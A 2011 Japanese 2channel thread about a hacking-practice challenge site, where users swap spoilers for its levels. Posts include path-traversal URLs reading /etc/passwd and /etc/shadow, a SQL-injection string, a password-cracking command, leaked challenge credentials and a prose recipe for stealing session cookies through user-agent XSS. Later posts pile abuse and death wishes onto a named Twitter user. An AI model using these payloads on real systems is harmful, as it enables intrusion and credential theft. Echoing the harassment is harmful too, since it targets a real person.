179 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:19:33.68
誰だよDDoSしたやつw
180 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:38:24.52
Lv4 総当りスクリプト書いてくる。
パタン少ないし、一秒に一回なら大丈夫だろ。
パタン少ないし、一秒に一回なら大丈夫だろ。
181 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:43:04.25
>>180
BAN強化中だお、そうでなくともそのパターンではじかれた人いるし・・・
BAN強化中だお、そうでなくともそのパターンではじかれた人いるし・・・
182 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:53:20.94
Lv4って普通だったら釣れるの待たなくちゃいけなくない?
方向性が違うのかな・・・。
方向性が違うのかな・・・。
183 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:18:22.43
お前らXSSって余所のサイトと連携しないと意味ないこと分かってんのww
184 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:20:09.47
あんだけtwitterのネタバレにはうるさかったのにもうここでもネタバレが始まってるなw
ここ見りゃちょっとPCに詳しい人ならLv.3まではクリアできるだろw
ここ見りゃちょっとPCに詳しい人ならLv.3まではクリアできるだろw
185 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:25:42.18
Lv.3をクリアするために切り裂きジョンをコンパイルした
186 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:36:07.99
>>169
自分のサーバに対してアタックかけるのは管理者として普通の行為だからだよ。
自分のサーバに対してアタックかけるのは管理者として普通の行為だからだよ。
187 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:56:42.25
Lv5まであるという話だけど、もうLv6も用意されてるよな?
あとTwitterでLv4相当の問題を募集してるけどこれはLv4が差し替えになったり分岐したりするんだろうか。
あとTwitterでLv4相当の問題を募集してるけどこれはLv4が差し替えになったり分岐したりするんだろうか。
188 :名無しさん@お腹いっぱい。:2011/02/24(木) 07:58:40.16
guesses: 1 time: 0:00:13:40
189 :名無しさん@お腹いっぱい。:2011/02/24(木) 08:41:48.66
4万5000人か。
大ハッキング時代の幕開けだなw
大ハッキング時代の幕開けだなw
190 :名無しさん@お腹いっぱい。:2011/02/24(木) 09:11:11.00
ネタバレひどすぎるだろ。
lv3まではググればほぼ出来るという・・・。
まぁそれもクラッキングの手順ではあるのかしらん。
lv3まではググればほぼ出来るという・・・。
まぁそれもクラッキングの手順ではあるのかしらん。
191 :名無しさん@お腹いっぱい。:2011/02/24(木) 09:21:48.56
常識的だとすれば問題ないかと。Lv4はさっぱりだがL
192 :名無しさん@お腹いっぱい。:2011/02/24(木) 09:39:43.21
Lv4の解きかたがわかった!!!!!!!!!
あとは作者が意図する条件を探すのみだ。
あとは作者が意図する条件を探すのみだ。
193 :名無しさん@お腹いっぱい。:2011/02/24(木) 10:05:03.27
LV3
パスワードはわかったけどユーザー名が分からん…
パスワードはわかったけどユーザー名が分からん…
194 :名無しさん@お腹いっぱい。:2011/02/24(木) 10:38:18.84
セットのはずだが
やり方間違ってるんじゃね
やり方間違ってるんじゃね
195 :名無しさん@お腹いっぱい。:2011/02/24(木) 11:12:43.11
>>193
セットだな。パスワードが分かった段階で軽く分かるはず
セットだな。パスワードが分かった段階で軽く分かるはず
196 :名無しさん@お腹いっぱい。:2011/02/24(木) 11:31:01.75
197 :名無しさん@お腹いっぱい。:2011/02/24(木) 11:37:04.64
198 :名無しさん@お腹いっぱい。:2011/02/24(木) 11:45:02.99
unshadowできなくね?
199 :名無しさん@お腹いっぱい。:2011/02/24(木) 11:51:15.38
>>198
相当回数トライしてできました。ちなみに切り裂き
相当回数トライしてできました。ちなみに切り裂き
200 :名無しさん@お腹いっぱい。:2011/02/24(木) 12:13:56.04
201 :名無しさん@お腹いっぱい。:2011/02/24(木) 12:22:45.52
>>199
ああ、切り裂きヨハンだよね?上にもあったように、ヨハンGUIでunshadow仕様と思うんだけど、出てくるのが0バイトの空っぽのファイルのみ
もしよければ使える拡張子だけでも教えて欲しい。それともURLをまるごとブチ込むの?
ああ、切り裂きヨハンだよね?上にもあったように、ヨハンGUIでunshadow仕様と思うんだけど、出てくるのが0バイトの空っぽのファイルのみ
もしよければ使える拡張子だけでも教えて欲しい。それともURLをまるごとブチ込むの?
202 :名無しさん@お腹いっぱい。:2011/02/24(木) 12:26:54.66
>>201
ググろう。ネタバレになるから
ググろう。ネタバレになるから
203 :名無しさん@お腹いっぱい。:2011/02/24(木) 12:27:40.00
ggr
204 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:19:29.54
やっとレベル2クリア><
205 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:21:51.46
これってブラウザ以外にツール必要なの?
ツール前提で不正アクセス禁止って糞だと思うんだが
ツール前提で不正アクセス禁止って糞だと思うんだが
206 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:25:49.91
ググって出てくるのがここじゃないのww
207 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:33:44.92
別にツールなくてもできるよ、手計算すればw
208 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:37:30.17
レベル3は楽勝過ぎw
209 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:46:24.64
もう問題かえてくんないかな、ネタバレしすぎ
210 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:54:45.70
LV4も楽勝w
XSSだね。
ユーザエージェントに書き込めばおk
XSSだね。
ユーザエージェントに書き込めばおk
211 :名無しさん@お腹いっぱい。:2011/02/24(木) 13:58:10.29
こいつネタバレしやがった
212 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:00:34.74
すげぇ・・とか思われると頭のどっかで思ってるんだろうな。
213 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:01:27.51
LV4ごときでハッカー扱いとか世の中なめすぎ
214 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:03:36.92
なんで書いちゃうの?Lv4クリア者のリストが短いほうが嬉しくないの?
無粋すぎて身の毛がよだつわ
無粋すぎて身の毛がよだつわ
215 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:12:30.79
twitterなんてもっとひどいぞlv1からやってること逐一書いてるバカとか、バカばかり
216 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:12:45.50
すげぇ・・・バカ。
217 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:14:25.53
馬鹿か本当に天才過ぎるんだろ。
218 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:20:24.74
まあ仮に天才だったらlv4をクリアした人数が増えてるはずだけどな
219 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:21:22.75
johnのGUIはiniが見つからないってエラーになると思うが。
220 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:21:37.10
知ったかぶってXSSとか言っとけばバカが釣れる
ここがメルカトル速報だ
ここがメルカトル速報だ
221 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:23:29.34
>>220
よう!ハッカーのたまごちゃん!元気?
よう!ハッカーのたまごちゃん!元気?
222 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:24:12.01
てかレベル5まだぁ?
223 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:27:01.27
おちんちん
224 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:27:34.07
2chにもtwitterにも禁書厨が沸いてこないのが意外だった
225 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:42:26.40
LV4のヒント:sessionid
226 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:43:10.46
あーもう答えいっちゃったかな
227 :名無しさん@お腹いっぱい。:2011/02/24(木) 14:49:28.72
lv4のヒント:html
228 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:05:50.29
お前ら釣りすぎw
lv4ヒント:javascript
lv4ヒント:javascript
229 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:08:15.00
lv4何がどう修正されたの?
230 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:09:25.66
>>229
クリアしたの今日だからわからん
クリアしたの今日だからわからん
231 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:18:08.68
>>201
ツールのマニュアルも読めないの。そりゃいいハッカーになれるよ
ツールのマニュアルも読めないの。そりゃいいハッカーになれるよ
232 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:18:46.78
lv4のヒント:CSS
233 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:19:46.60
>>232
ダウト
ダウト
234 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:32:10.00
Lv3の問題かわった?
235 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:57:29.44
Lv4がXSSって言うけどさ、それってログインできない人にしか効果ないんじゃねw
236 :名無しさん@お腹いっぱい。:2011/02/24(木) 15:59:23.82
from_VIPwww おまwwwちょwww
237 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:00:31.80
ハッカー増えた?めりこんじゃった?
238 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:01:22.35
http://hackme.netfire.jp/Lv3/login?page=/etc/passwd
とか
http://hackme.netfire.jp/Lv3/login?page=/etc/shadow
とかやっても見えないんだけど
とか
http://hackme.netfire.jp/Lv3/login?page=/etc/shadow
とかやっても見えないんだけど
239 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:02:05.38
>>233
いや、XSSはCSSとも言う
いや、XSSはCSSとも言う
240 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:02:30.13
何もわかってない証拠
241 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:03:22.01
>>235
できない人いるじゃん
できない人いるじゃん
242 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:03:48.15
>>238
あぁ・・・お前全く仕組みを理解できてないわ
あぁ・・・お前全く仕組みを理解できてないわ
243 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:04:20.69
>>238
できないんだから、やり方が間違ってんだろ。
できないんだから、やり方が間違ってんだろ。
244 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:05:03.70
>>242
ごめん、くわしく教えてくれる?
ごめん、くわしく教えてくれる?
245 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:05:25.00
246 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:07:13.53
>XSSやもだ
やもって何?
やもって何?
247 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:07:43.63
>>244
ディレクトリを遡る方法を考えればいい
ディレクトリを遡る方法を考えればいい
248 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:08:33.99
>>244
人に回答聞いてクリアしてもつまんねーぞ?
人に回答聞いてクリアしてもつまんねーぞ?
249 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:10:58.92
250 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:14:31.60
残念だったね
251 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:15:04.53
最近のゆとりはパないな・・・
252 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:16:21.60
それよりLv.4の手順は分かるんだが俺が自分で書いたものだと消されてしまうんだよね
これはあくまでクラック体験サイトだから作者の答えと一致してないとダメって事なのか?
これはあくまでクラック体験サイトだから作者の答えと一致してないとダメって事なのか?
253 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:17:00.84
そんなことはLV2を見れば明らか
254 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:18:42.80
255 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:18:53.72
>>252
使える文法に沿ったハックじゃないと却下される
使える文法に沿ったハックじゃないと却下される
256 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:24:09.75
>>255
おk がんばるわ
おk がんばるわ
257 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:27:08.26
Lv4て手法が多すぎて一致させるほうが難しくないかコレ
258 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:27:19.21
Lv3普通の暗号化ならともかく
塩漬けされてて解読できるの?
それとも総当たりするんだろうか
塩漬けされてて解読できるの?
それとも総当たりするんだろうか
259 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:29:57.84
結局のところ本当に脆弱性があるわけじゃなくてそれっぽく作ってるだけのクイズなんだよな…
LV4はなかなか作り手側が期待してる答えが見つからん
LV4はなかなか作り手側が期待してる答えが見つからん
260 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:29:59.88
このスレネタバレ祭りだな
261 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:30:31.16
LV3ネタバレ激しいんで答え言うわ。
ID:root
Password:test123
ID:root
Password:test123
262 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:33:30.74
あーあ
263 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:33:40.20
>>261
そんなに目立ちたいか
そんなに目立ちたいか
264 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:34:17.16
答えなんてどうでもいいから考え方が知りたい
265 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:35:47.36
>>264
俺も
俺も
266 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:36:44.85
これがハッカーの道をそれたおこさまか。あわれなもんだ。
267 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:39:07.66
PSPとかでもHalloworldだけ公開して脆弱性潰されてるし、どこでも同じ馬鹿はいるもんだ
268 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:39:09.81
WEBアプリ作ったことない奴とかLinux運用したことも無い奴は帰れってことだ
269 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:41:25.83
270 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:44:51.12
肉を切らせたら骨抜かれちゃって骨断てなくなるのに
271 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:45:34.25
もう答えでたから考え方だけ言うと手法はディレクトリトラバーサル
サーバのrootパスワードが置いてあるディレクトリにアクセスができる脆弱性なんだが、それだけではパスがわからなくてshadowにある暗号化されたものと合わせて初めてパスの解析ができる(まぁ本来はshadow見るにはroot権限いるわけだが)
その解析の結果とログインのパスが同じだったってだけだな
サーバのrootパスワードが置いてあるディレクトリにアクセスができる脆弱性なんだが、それだけではパスがわからなくてshadowにある暗号化されたものと合わせて初めてパスの解析ができる(まぁ本来はshadow見るにはroot権限いるわけだが)
その解析の結果とログインのパスが同じだったってだけだな
272 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:46:55.85
ドヤァ・・・
273 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:02.83
john-mmx --users=root passfile
余裕でした
余裕でした
274 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:47.63
自力でLv.3クリアしたのがあほらしくなってくるな
275 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:55.60
答えだけのネタバレなら運営が変えてしまえばすむことだが、
考え方まで書かれちゃうともうだめだな
考え方まで書かれちゃうともうだめだな
276 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:48:57.06
2×3と3×2は違うというあれだな
277 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:49:02.94
これいったん
278 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:49:21.37
Lv2の答えわからなすぎてむかついてきた。
' OR 't' = 't
でいいだろ
' OR 't' = 't
でいいだろ
279 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:08.18
foobarさんどこいってしもたん・・・?
280 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:10.02
> その解析の結果とログインのパスが同じだったってだけだな
この無知感がたまらないな。
あと、mmx版なんて使ってるのはまさにキディ
この無知感がたまらないな。
あと、mmx版なんて使ってるのはまさにキディ
281 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:46.98
どうせ問題自体変わるんじゃないのか
5番以内にクリアしたのに500人以上いるし
5番以内にクリアしたのに500人以上いるし
282 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:51:19.09
>>271
なんでWebなのにrootが使えるのか知ってたら教えてほしい
なんでWebなのにrootが使えるのか知ってたら教えてほしい
283 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:52:51.22
>>282
これalpha版だからいろいろといい加減だろ
これalpha版だからいろいろといい加減だろ
284 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:53:21.57
285 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:53:27.83
暫定的に停止だと
ソースはネットファイア公式Twitter
ソースはネットファイア公式Twitter
286 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:57:46.59
>>278
ダメだな。全然ダメだ。
ダメだな。全然ダメだ。
287 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:57:58.70
まあ妥当な判断
288 :名無しさん@お腹いっぱい。:2011/02/24(木) 16:58:06.23
2chに解説とID/Pass書いた上にドヤ顔で解説してる馬鹿がいるってつぶやきで発覚したなw
GJ!ここの誰か!
GJ!ここの誰か!
289 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:05.11
土曜日に公開すれば良かったな。
一気にLV3 1万人突破とかなったらおもしろい
一気にLV3 1万人突破とかなったらおもしろい
290 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:42.34
Lv4がわからん
UA偽装すればXSSできるのはわかるけど
ログ残したあとにfoobarさんやhogehogeさんとやらがアクセスしてくれるのか?
UA偽装すればXSSできるのはわかるけど
ログ残したあとにfoobarさんやhogehogeさんとやらがアクセスしてくれるのか?
291 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:49.68
自演乙w
でもこういうのって自分で答え出すから楽しいのにな
お前らもクリアした瞬間アドレナリンがわっさー!と出たろ?
でもこういうのって自分で答え出すから楽しいのにな
お前らもクリアした瞬間アドレナリンがわっさー!と出たろ?
292 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:55.07
ツイッターに堂々とコピペスクリプト書いたヤツがいるぞw
293 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:01:29.47
@qmotasつまんねえ
ネタも分からない馬鹿
視ね
ネタも分からない馬鹿
視ね
294 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:02:05.38
>>291
いや、解析結果を見て、ああなんでこれ試さなかったんだろwっておもった
いや、解析結果を見て、ああなんでこれ試さなかったんだろwっておもった
295 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:02:08.82
>>292
どこどこ?
どこどこ?
296 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:03:23.73
早く問題変えろよ。
ネタバレしたやつ死ねよカス。
マジカス。しね
ネタバレしたやつ死ねよカス。
マジカス。しね
297 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:05:47.66
>>290
UA偽装したら普通にログイン失敗画面でjavascriptが勝手に実行されるから、
5ログ中の一番下の奴(=foobar)が失敗画面見るわけで、
自分のクッキーを別鯖に送るように書けば良いんだよ。
んで別鯖をお前が監視して、ゲットしたセッションIDをゲットできるわけだが、
その後にfoobarはログイン成功するから、
セッションIDを自分のブラウザのクッキーに仕込んでアクセスすればログイン成功
UA偽装したら普通にログイン失敗画面でjavascriptが勝手に実行されるから、
5ログ中の一番下の奴(=foobar)が失敗画面見るわけで、
自分のクッキーを別鯖に送るように書けば良いんだよ。
んで別鯖をお前が監視して、ゲットしたセッションIDをゲットできるわけだが、
その後にfoobarはログイン成功するから、
セッションIDを自分のブラウザのクッキーに仕込んでアクセスすればログイン成功
298 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:06:06.32
マジレスしたら変なのが沸いてくるこんなalpha版レベルのサイトより海外に面白い脆弱性エミュサイトあるから探してみ
レベルも全然違う
レベルも全然違う
299 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:10:09.49
もう停止したw
対応早いなw
対応早いなw
300 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:12:28.10
301 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:15:36.54
LV3合格者の総数が増えたり減ったりしてるんだけど、ばらした奴がばれてBANされてるの?
302 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:15:59.22
MSIE6だからActiveXObject使ってAjax?
303 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:16:34.86
とりあえずサーバ管理する時はLv2〜Lv4くらいは最低でも対応してないと危険ってことがよく分かった。
そういう意味でとても有意義だった。
ググって手法を探す作業も悪くない
そういう意味でとても有意義だった。
ググって手法を探す作業も悪くない
304 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:16:59.55
305 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:18.99
このぐらいのことはサイト作る時点で想定しない方がおかしい。
306 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:37.41
ログイン成功時点でセッションID変わるだろ?
307 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:47.91
twitterと2chで連絡とるなw
308 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:50.10
>>301
俺なら晒されたID/パスを罠にしてBANコースだなw
俺なら晒されたID/パスを罠にしてBANコースだなw
309 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:01.03
qmotasみんなでフォローしてやろうぜ
310 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:40.84
>>309
それいいな
それいいな
311 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:50.66
>>306
変わんないよ
変わんないよ
312 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:19:51.51
ネタバレいやなら2chなんて見るなよw
ばかじゃないのw
ばかじゃないのw
313 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:20:24.69
>>309はqmota
自演乙
自演乙
314 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:20:32.33
315 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:22.79
>>306
聞く前に確認しろよ。目の前の箱はダンボールか?
聞く前に確認しろよ。目の前の箱はダンボールか?
316 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:31.65
>>312
公式のルールも守れない屑が吠えてろよwww
公式のルールも守れない屑が吠えてろよwww
317 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:45.54
5番目ってfoobarなの?
318 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:53.63
319 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:22:07.94
>>312
我慢の出来ないお子ちゃまか?
我慢の出来ないお子ちゃまか?
320 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:24:15.09
>>317
5番目はhogehoge
5番目はhogehoge
321 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:26:24.06
なんでこいうのってhogehogeが多いの?
322 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:27:45.36
piyopiyo
323 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:28:48.69
fooとbarの日本語版
324 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:28:54.36
慣例みたいな感じ
325 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:29:02.92
piyopiyo最近見かけないな・・
326 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:29:57.46
327 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:32:11.74
piyoよりfugaだな
328 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:33:16.23
俺はhogeを使う奴の書いたコードは信用しないことにしている
329 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:33:54.61
330 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:34:29.22
>>326
へ?
へ?
331 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:34:47.35
ログイン失敗したやつがfoobarでもhogehogeでもないのであきらめた
332 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:35:59.60
スクリプトからCookieだけ飛ばさせて自鯖を監視してたのにずっとぼっちだった俺はなんだったんだ・・・
333 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:36:38.49
>>331
ログインに失敗したのはGoogle先生です
ログインに失敗したのはGoogle先生です
334 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:37:11.68
実際に他の鯖と通信させるとかチェック面倒そうじゃね?
とかつい作る立場で考えてしまったんだが・・・
とかつい作る立場で考えてしまったんだが・・・
335 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:38:32.39
別に面倒じゃないだろ
なに「深く考えすぎて逆にわからなかった」みたいな言い方してんだよ
なに「深く考えすぎて逆にわからなかった」みたいな言い方してんだよ
336 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:15.04
Lv3暫定的に停止って言ってたけど動いてるな
パスワード通らないし、クリア不可能状態?
パスワード通らないし、クリア不可能状態?
337 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:24.08
面倒だろ
338 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:58.92
スクリプトうんぬんはわかるがあのログの見方がわからん
339 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:03.78
他のサーバーに飛ぶわけないだろ。
そんなことしたらネットファイアが攻撃もとのサイトになるじゃないかw
そんなことしたらネットファイアが攻撃もとのサイトになるじゃないかw
340 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:26.19
>>337
UAの対して規定のデータ送るだけだから面倒じゃないはず
UAの対して規定のデータ送るだけだから面倒じゃないはず
341 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:38.48
こういうのって向こうさんのログは面白そうだよね。
342 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:45.14
Lv3のパスワード一応分かったんだけど、入力しても間違ってるって言われた…
もうギブアップだわ…
もうギブアップだわ…
343 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:42:17.52
>>333
whoisしてびびったわ
whoisしてびびったわ
344 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:44:16.84
345 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:46:46.65
>>297が中の人で、このスレを見ている人間が管理しているサーバを見つけようとしているのなら無粋なことをした。
346 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:48:22.78
>>344
面倒どころか魔法だよ。
面倒どころか魔法だよ。
347 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:49:08.45
>>297
え、向こうが想定した内容のUAにしてアクセスすればわざわざbotがアクセスしに来てくれるの?
え、向こうが想定した内容のUAにしてアクセスすればわざわざbotがアクセスしに来てくれるの?
348 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:51:26.28
俺はそんな面倒な事じゃなくて作者が想定してるjsでいけば作者からのjsで答えを教えてくれるくらいのレベルで考えてたんだが
349 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:11.21
あのログ、やるたびに順繰りさせればいいのに
350 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:38.81
毎回エンティティ変換されて涙目な俺は魔法使い
351 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:49.75
「みんなでqmotasフォローしようぜ」とか言ってたけど、フォローしたの俺ともう1人だけじゃないか?
352 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:55:05.72
フォローしてどうすんの?
353 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:56:49.11
>>350
仲間。昨日からLv4でインジェクション起こせなくて詰まっとるw
仲間。昨日からLv4でインジェクション起こせなくて詰まっとるw
354 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:58:43.30
LV3でとまったーorz
355 :名無しさん@お腹いっぱい。:2011/02/24(木) 17:59:12.65
356 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:01:54.42
>>352
囲む
囲む
357 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:05:09.77
>>352
粘着
粘着
358 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:12:29.87
lv4
確実に動く(自サイトで実証してから)スクリプトで
相当な方法を試しているけどもダメだな。
何を想定したんだかw
正解意図の回答はいつになったら出るんだろう・・・
これはもう宝くじ状態な気がする。
同じサイト状態ならハッキング可能であろうスクリプトもはじかれる。
確実に動く(自サイトで実証してから)スクリプトで
相当な方法を試しているけどもダメだな。
何を想定したんだかw
正解意図の回答はいつになったら出るんだろう・・・
これはもう宝くじ状態な気がする。
同じサイト状態ならハッキング可能であろうスクリプトもはじかれる。
359 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:14:57.79
360 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:14:57.81
UA偽造しようにも後ろに,gzip(gfe),gzip(gfe),gzip(gfe)がついてうぜえ
361 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:15:54.48
自サイトってどうやって作るの?
362 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:18:46.98
>>331
hogehogeだろ。UAが一緒。
hogehogeだろ。UAが一緒。
363 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:19:06.63
qmotas フォローしても何もでませんよ
12分前
こっちがいろいろお見舞いするんだよ
364 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:20:34.57
>>363
ん?lv3のパス晒してドヤ顔してた子が逆恨みの粘着か?
ん?lv3のパス晒してドヤ顔してた子が逆恨みの粘着か?
365 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:21:45.55
>>363
セキュリティ板にここまで頭の弱い子がいたとわ・・・
セキュリティ板にここまで頭の弱い子がいたとわ・・・
366 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:22:42.49
>>365
わ→は
わ→は
367 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:23:12.40
>>363
何をお見舞いしてくれるんですかね
何をお見舞いしてくれるんですかね
368 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:23:17.34
>>366
wwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwww
369 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:24:37.70
qmotasのIP抜きました1
370 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:28:20.15
IPアドレスがわかったんだ!すごいね!きみならクラックできるよ!!
371 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:28:47.86
372 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:30:34.52
>>371
それはちょっと嬉しい
それはちょっと嬉しい
373 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:31:27.68
>>362
UAだけで同一とおもっちゃってよかったのか
UAだけで同一とおもっちゃってよかったのか
